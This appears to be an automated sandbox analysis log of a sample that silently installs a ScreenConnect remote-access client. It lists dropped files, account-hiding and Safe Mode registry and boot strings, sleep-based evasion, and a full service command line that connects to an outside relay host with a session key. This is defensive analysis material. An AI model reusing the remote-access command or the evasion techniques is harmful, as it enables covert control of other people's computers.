Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICFCA.tmp
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICBF0.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dll
Source: C:\Windows\SysWOW64\msiexec.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICFCA.tmp
Source: C:\Windows\System32\msiexec.exe | File created: C:\Windows\Installer\MSICBF0.tmp
Source: ScreenConnect.ClientService.dll.2.dr | Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (a532d472f1ff1d4e)

                                  Hooking and other Techniques for Hiding and Protection

                                  barindex
                                  Source: f53WqfzzNt.exe, 00000000.00000002.1745545743.0000000005890000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: f53WqfzzNt.exe, 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: rundll32.exe, 00000004.00000003.1736264146.00000000045B6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829810694.0000000002312000.00000002.00000001.01000000.0000000D.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1829695484.00000000022D0000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1839973403.000000001B342000.00000002.00000001.01000000.0000000F.sdmp | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: f53WqfzzNt.exe | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.ClientService.dll.2.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                                  Source: ScreenConnect.Windows.dll.2.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: ScreenConnect.Windows.dll.4.dr | String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\System32\msiexec.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Process information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 1670000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 3150000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 5150000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 68E0000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 6070000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 78E0000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 88E0000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: 8B70000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Memory allocated: B30000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Memory allocated: 14F0000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Memory allocated: 13F0000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Memory allocated: 18B0000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Memory allocated: 1B0F0000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Memory allocated: 2270000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Memory allocated: 1A340000 memory reserve | memory write watch
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Thread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Thread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSICFCA.tmp
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Windows\Installer\MSICBF0.tmp
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.Compression.Cab.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll
                                  Source: C:\Windows\SysWOW64\msiexec.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
                                  Source: C:\Windows\System32\msiexec.exe | Dropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe TID: 7500 | Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe TID: 7904 | Thread sleep count: 46 > 30
                                  Source: C:\Windows\System32\svchost.exe TID: 8092 | Thread sleep time: -30000s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe TID: 7264 | Thread sleep time: -30000s >= -30000s
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe TID: 8136 | Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Windows\SysWOW64\msiexec.exe | File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Windows\System32\msiexec.exe | File Volume queried: C:\ FullSizeInformation
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Thread delayed: delay time: 922337203685477
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Thread delayed: delay time: 922337203685477
                                  Source: ScreenConnect.ClientService.exe, 00000007.00000002.3598453854.0000000004230000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
                                  Source: svchost.exe, 00000009.00000002.3446108257.000001859C05E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3445586921.0000018596A2B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                                  Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Process token adjusted: Debug
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Process token adjusted: Debug
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Memory allocated: page read and write | page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                  Source: 0.0.f53WqfzzNt.exe.14578ec.1.raw.unpack, Program.cs | Reference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsMemoryNativeLibrary.cs | Reference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.2.f53WqfzzNt.exe.5890000.6.raw.unpack, WindowsExtensions.cs | Reference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                  Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.clientservice.exe" "?e=access&y=guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=bgiaaackaabsu0exaagaaaeaaqc1kwkbpg72shug%2fcugwqb7iuebcyny1kcdtceo3n0ry4axiph%2ffmztln0b%2bg2miuqorkgq0xsvxj7wucz%2bdiimwdt7qllgfko33osoqisfilkobrosqmoo0cyg%2fpkva7aaau%2bym8zey9okpyj7knkvh679krkgwwm5tfc%2fbhzztt1d5pfiewfvi67rlcagqxh1hudy%2bbdi6lg6r8m8lqczrbhxazj%2fuvxvugxn6zwttc7e00yjiy6fpwniox5ej%2fn2ux9gcwu%2bpspaixxjhoyehv84bhaut0rgc1re8m9puttx9udji37opbolw%2f5qq735uizmwagufhfj%2flzeryvq&t=golden-team-001"
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr | Binary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.2.dr | Binary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\f53WqfzzNt.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\msiexec.exe | Queries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp-\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Windows\SysWOW64\rundll32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
